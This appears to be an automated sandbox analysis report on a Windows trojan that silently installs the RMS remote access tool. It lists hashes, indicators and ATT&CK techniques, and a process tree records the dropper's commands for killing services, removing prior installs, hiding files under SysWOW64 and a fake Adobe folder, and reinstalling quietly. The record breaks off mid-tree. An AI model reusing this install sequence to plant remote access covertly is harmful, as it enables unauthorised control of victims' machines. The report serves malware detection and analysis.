rms | 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6

Analysis

max time kernel
146s
max time network
150s
platform
windows10_x64
resource
win10-en-20211208
submitted
28-01-2022 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe
Size

6.8MB
MD5

4795fe6f5ce9557f6cbba6457b7931cc
SHA1

f7abfa5b3dbb90a3804efc1ee82a1e7d951089d8
SHA256

550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
SHA512

7103d27d71f66434ca24dc4ee64b114bb375440f422c1191ac6eb15eabbc250c8b8d23dcdde523f02d446ef34332deb99256cccaba0ba09f31b4619d0f3e0fa3

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 13 IoCs

pid	Process
3824	set.exe
4084	setting.exe
2848	rfusclient.exe
3968	rutserv.exe
64	rfusclient.exe
684	rutserv.exe
3900	rfusclient.exe
744	rutserv.exe
1380	rutserv.exe
688	rfusclient.exe
408	rfusclient.exe
3360	rfusclient.exe
3728	wget.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000500000001ab29-438.dat	upx
behavioral2/files/0x000500000001ab29-439.dat	upx

Loads dropped DLL 23 IoCs

pid	Process
4060	MsiExec.exe
2848	rfusclient.exe
2848	rfusclient.exe
2848	rfusclient.exe
3968	rutserv.exe
64	rfusclient.exe
64	rfusclient.exe
64	rfusclient.exe
684	rutserv.exe
3900	rfusclient.exe
3900	rfusclient.exe
3900	rfusclient.exe
744	rutserv.exe
1380	rutserv.exe
688	rfusclient.exe
688	rfusclient.exe
688	rfusclient.exe
408	rfusclient.exe
408	rfusclient.exe
408	rfusclient.exe
3360	rfusclient.exe
3360	rfusclient.exe
3360	rfusclient.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\msvcp90.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\rutserv.exe	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\rwln.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\vp8encoder.dll	msiexec.exe
File created	C:\Windows\SysWOW64\RWLN.dll	rutserv.exe
File created	C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\msvcr90.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\rfusclient.exe	msiexec.exe
File opened for modification	C:\Windows\SysWOW64\RWLN.dll	rutserv.exe
File created	C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\msimg32.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\rasadhlp.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\gdiplus.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\oledlg.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\ripcserver.dll	msiexec.exe
File created	C:\Windows\SysWOW64\sysfiles\vp8decoder.dll	msiexec.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\AdobeUpdates\id.txt	cmd.exe
File created	C:\Windows\AdobeUpdates\group.txt	cmd.exe
File created	C:\Windows\Installer\f75f03d.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{AB7AA605-500F-4153-8207-FB5563419112}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f75f040.msi	msiexec.exe
File created	C:\Windows\AdobeUpdates\mac.txt	cmd.exe
File opened for modification	C:\Windows\AdobeUpdates\mac.txt	cmd.exe
File opened for modification	C:\Windows\AdobeUpdates\comp.txt	cmd.exe
File opened for modification	C:\Windows\Installer\f75f03d.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5BB.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB3A.tmp	msiexec.exe
File created	C:\Windows\AdobeUpdates\comp.txt	cmd.exe
File opened for modification	C:\Windows\AdobeUpdates\group.txt	cmd.exe
File opened for modification	C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\AdobeUpdates\id.txt	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
3064	tasklist.exe
3544	tasklist.exe
3136	tasklist.exe
1476	tasklist.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2772	taskkill.exe
2648	taskkill.exe
916	taskkill.exe
584	taskkill.exe

Modifies data under HKEY_USERS 20 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	rfusclient.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	rfusclient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	rfusclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	rfusclient.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	rfusclient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	rfusclient.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList	msiexec.exe

Runs net.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1192	PING.EXE
1952	PING.EXE
3952	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
432	msiexec.exe
432	msiexec.exe
3968	rutserv.exe
3968	rutserv.exe
684	rutserv.exe
684	rutserv.exe
744	rutserv.exe
744	rutserv.exe
1380	rutserv.exe
1380	rutserv.exe
1380	rutserv.exe
1380	rutserv.exe
1380	rutserv.exe
1380	rutserv.exe
688	rfusclient.exe
688	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
3360	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	tasklist.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	3544	tasklist.exe
Token: SeDebugPrivilege	3136	tasklist.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1476	tasklist.exe
Token: SeShutdownPrivilege	652	msiexec.exe
Token: SeIncreaseQuotaPrivilege	652	msiexec.exe
Token: SeSecurityPrivilege	432	msiexec.exe
Token: SeCreateTokenPrivilege	652	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	652	msiexec.exe
Token: SeLockMemoryPrivilege	652	msiexec.exe
Token: SeIncreaseQuotaPrivilege	652	msiexec.exe
Token: SeMachineAccountPrivilege	652	msiexec.exe
Token: SeTcbPrivilege	652	msiexec.exe
Token: SeSecurityPrivilege	652	msiexec.exe
Token: SeTakeOwnershipPrivilege	652	msiexec.exe
Token: SeLoadDriverPrivilege	652	msiexec.exe
Token: SeSystemProfilePrivilege	652	msiexec.exe
Token: SeSystemtimePrivilege	652	msiexec.exe
Token: SeProfSingleProcessPrivilege	652	msiexec.exe
Token: SeIncBasePriorityPrivilege	652	msiexec.exe
Token: SeCreatePagefilePrivilege	652	msiexec.exe
Token: SeCreatePermanentPrivilege	652	msiexec.exe
Token: SeBackupPrivilege	652	msiexec.exe
Token: SeRestorePrivilege	652	msiexec.exe
Token: SeShutdownPrivilege	652	msiexec.exe
Token: SeDebugPrivilege	652	msiexec.exe
Token: SeAuditPrivilege	652	msiexec.exe
Token: SeSystemEnvironmentPrivilege	652	msiexec.exe
Token: SeChangeNotifyPrivilege	652	msiexec.exe
Token: SeRemoteShutdownPrivilege	652	msiexec.exe
Token: SeUndockPrivilege	652	msiexec.exe
Token: SeSyncAgentPrivilege	652	msiexec.exe
Token: SeEnableDelegationPrivilege	652	msiexec.exe
Token: SeManageVolumePrivilege	652	msiexec.exe
Token: SeImpersonatePrivilege	652	msiexec.exe
Token: SeCreateGlobalPrivilege	652	msiexec.exe
Token: SeShutdownPrivilege	3636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3636	msiexec.exe
Token: SeCreateTokenPrivilege	3636	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3636	msiexec.exe
Token: SeLockMemoryPrivilege	3636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3636	msiexec.exe
Token: SeMachineAccountPrivilege	3636	msiexec.exe
Token: SeTcbPrivilege	3636	msiexec.exe
Token: SeSecurityPrivilege	3636	msiexec.exe
Token: SeTakeOwnershipPrivilege	3636	msiexec.exe
Token: SeLoadDriverPrivilege	3636	msiexec.exe
Token: SeSystemProfilePrivilege	3636	msiexec.exe
Token: SeSystemtimePrivilege	3636	msiexec.exe
Token: SeProfSingleProcessPrivilege	3636	msiexec.exe
Token: SeIncBasePriorityPrivilege	3636	msiexec.exe
Token: SeCreatePagefilePrivilege	3636	msiexec.exe
Token: SeCreatePermanentPrivilege	3636	msiexec.exe
Token: SeBackupPrivilege	3636	msiexec.exe
Token: SeRestorePrivilege	3636	msiexec.exe
Token: SeShutdownPrivilege	3636	msiexec.exe
Token: SeDebugPrivilege	3636	msiexec.exe
Token: SeAuditPrivilege	3636	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3636	msiexec.exe
Token: SeChangeNotifyPrivilege	3636	msiexec.exe
Token: SeRemoteShutdownPrivilege	3636	msiexec.exe
Token: SeUndockPrivilege	3636	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 3824	2564	550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe	68
PID 2564 wrote to memory of 3824	2564	550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe	68
PID 2564 wrote to memory of 3824	2564	550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe	68
PID 3824 wrote to memory of 4084	3824	set.exe	69
PID 3824 wrote to memory of 4084	3824	set.exe	69
PID 3824 wrote to memory of 4084	3824	set.exe	69
PID 4084 wrote to memory of 3560	4084	setting.exe	70
PID 4084 wrote to memory of 3560	4084	setting.exe	70
PID 4084 wrote to memory of 3560	4084	setting.exe	70
PID 3560 wrote to memory of 1036	3560	cmd.exe	72
PID 3560 wrote to memory of 1036	3560	cmd.exe	72
PID 3560 wrote to memory of 1036	3560	cmd.exe	72
PID 3560 wrote to memory of 1428	3560	cmd.exe	73
PID 3560 wrote to memory of 1428	3560	cmd.exe	73
PID 3560 wrote to memory of 1428	3560	cmd.exe	73
PID 3560 wrote to memory of 2292	3560	cmd.exe	74
PID 3560 wrote to memory of 2292	3560	cmd.exe	74
PID 3560 wrote to memory of 2292	3560	cmd.exe	74
PID 3560 wrote to memory of 1068	3560	cmd.exe	75
PID 3560 wrote to memory of 1068	3560	cmd.exe	75
PID 3560 wrote to memory of 1068	3560	cmd.exe	75
PID 3560 wrote to memory of 1736	3560	cmd.exe	76
PID 3560 wrote to memory of 1736	3560	cmd.exe	76
PID 3560 wrote to memory of 1736	3560	cmd.exe	76
PID 3560 wrote to memory of 3260	3560	cmd.exe	77
PID 3560 wrote to memory of 3260	3560	cmd.exe	77
PID 3560 wrote to memory of 3260	3560	cmd.exe	77
PID 3260 wrote to memory of 3984	3260	net.exe	78
PID 3260 wrote to memory of 3984	3260	net.exe	78
PID 3260 wrote to memory of 3984	3260	net.exe	78
PID 3560 wrote to memory of 3792	3560	cmd.exe	79
PID 3560 wrote to memory of 3792	3560	cmd.exe	79
PID 3560 wrote to memory of 3792	3560	cmd.exe	79
PID 3560 wrote to memory of 3064	3560	cmd.exe	80
PID 3560 wrote to memory of 3064	3560	cmd.exe	80
PID 3560 wrote to memory of 3064	3560	cmd.exe	80
PID 3560 wrote to memory of 3244	3560	cmd.exe	81
PID 3560 wrote to memory of 3244	3560	cmd.exe	81
PID 3560 wrote to memory of 3244	3560	cmd.exe	81
PID 3560 wrote to memory of 2772	3560	cmd.exe	83
PID 3560 wrote to memory of 2772	3560	cmd.exe	83
PID 3560 wrote to memory of 2772	3560	cmd.exe	83
PID 3560 wrote to memory of 3544	3560	cmd.exe	84
PID 3560 wrote to memory of 3544	3560	cmd.exe	84
PID 3560 wrote to memory of 3544	3560	cmd.exe	84
PID 3560 wrote to memory of 3868	3560	cmd.exe	85
PID 3560 wrote to memory of 3868	3560	cmd.exe	85
PID 3560 wrote to memory of 3868	3560	cmd.exe	85
PID 3560 wrote to memory of 2648	3560	cmd.exe	86
PID 3560 wrote to memory of 2648	3560	cmd.exe	86
PID 3560 wrote to memory of 2648	3560	cmd.exe	86
PID 3560 wrote to memory of 3136	3560	cmd.exe	87
PID 3560 wrote to memory of 3136	3560	cmd.exe	87
PID 3560 wrote to memory of 3136	3560	cmd.exe	87
PID 3560 wrote to memory of 1352	3560	cmd.exe	88
PID 3560 wrote to memory of 1352	3560	cmd.exe	88
PID 3560 wrote to memory of 1352	3560	cmd.exe	88
PID 3560 wrote to memory of 916	3560	cmd.exe	89
PID 3560 wrote to memory of 916	3560	cmd.exe	89
PID 3560 wrote to memory of 916	3560	cmd.exe	89
PID 3560 wrote to memory of 1476	3560	cmd.exe	90
PID 3560 wrote to memory of 1476	3560	cmd.exe	90
PID 3560 wrote to memory of 1476	3560	cmd.exe	90
PID 3560 wrote to memory of 1524	3560	cmd.exe	91

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1428	attrib.exe
2292	attrib.exe
1068	attrib.exe
1736	attrib.exe

C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe
"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Users\Admin\AppData\Local\Temp\set.exe
  "C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Users\Admin\AppData\Local\Temp\setting.exe
    "C:\Users\Admin\AppData\Local\Temp\setting.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:3560
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1036
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -S -H -r "C:\Windows\system32\sysfiles"
        5⤵
        Views/modifies file attributes
        
        PID:1428
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -S -H -r "C:\Windows\syswow64\sysfiles"
        5⤵
        Views/modifies file attributes
        
        PID:2292
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"
        5⤵
        Views/modifies file attributes
        
        PID:1068
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"
        5⤵
        Views/modifies file attributes
        
        PID:1736
    - - C:\Windows\SysWOW64\net.exe
        
        net stop rmanservice
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3260
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        6⤵
        
        PID:3984
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "rmanservice"
        5⤵
        
        PID:3792
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
    - - C:\Windows\SysWOW64\find.exe
        
        find "rfusclient.exe"
        5⤵
        
        PID:3244
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rfusclient.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3544
    - - C:\Windows\SysWOW64\find.exe
        
        find "rfusclient.exe *32"
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rfusclient.exe *32
        5⤵
        Kills process with taskkill
        
        PID:2648
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
    - - C:\Windows\SysWOW64\find.exe
        
        find "rutserv.exe"
        5⤵
        
        PID:1352
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rutserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
    - - C:\Windows\SysWOW64\find.exe
        
        find "rutserv.exe *32"
        5⤵
        
        PID:1524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rutserv.exe *32
        5⤵
        Kills process with taskkill
        
        PID:584
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:652
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3636
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress
        5⤵
        
        PID:1420
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
        5⤵
        
        PID:1404
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress
        5⤵
        
        PID:1268
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress
        5⤵
        
        PID:1028
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        5⤵
        
        PID:816
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f
        5⤵
        
        PID:4072
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f
        5⤵
        
        PID:700
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f
        5⤵
        
        PID:2704
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f
        5⤵
        
        PID:3824
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f
        5⤵
        
        PID:3360
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f
        5⤵
        
        PID:2296
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 -w 500 google.com.ua
        5⤵
        Runs ping.exe
        
        PID:1192
    - - C:\Windows\SysWOW64\msiexec.exe
        
        MsiExec /I "rms5.2.1.msi" /qn
        5⤵
        
        PID:1336
    - - C:\Windows\SysWOW64\PING.EXE
        
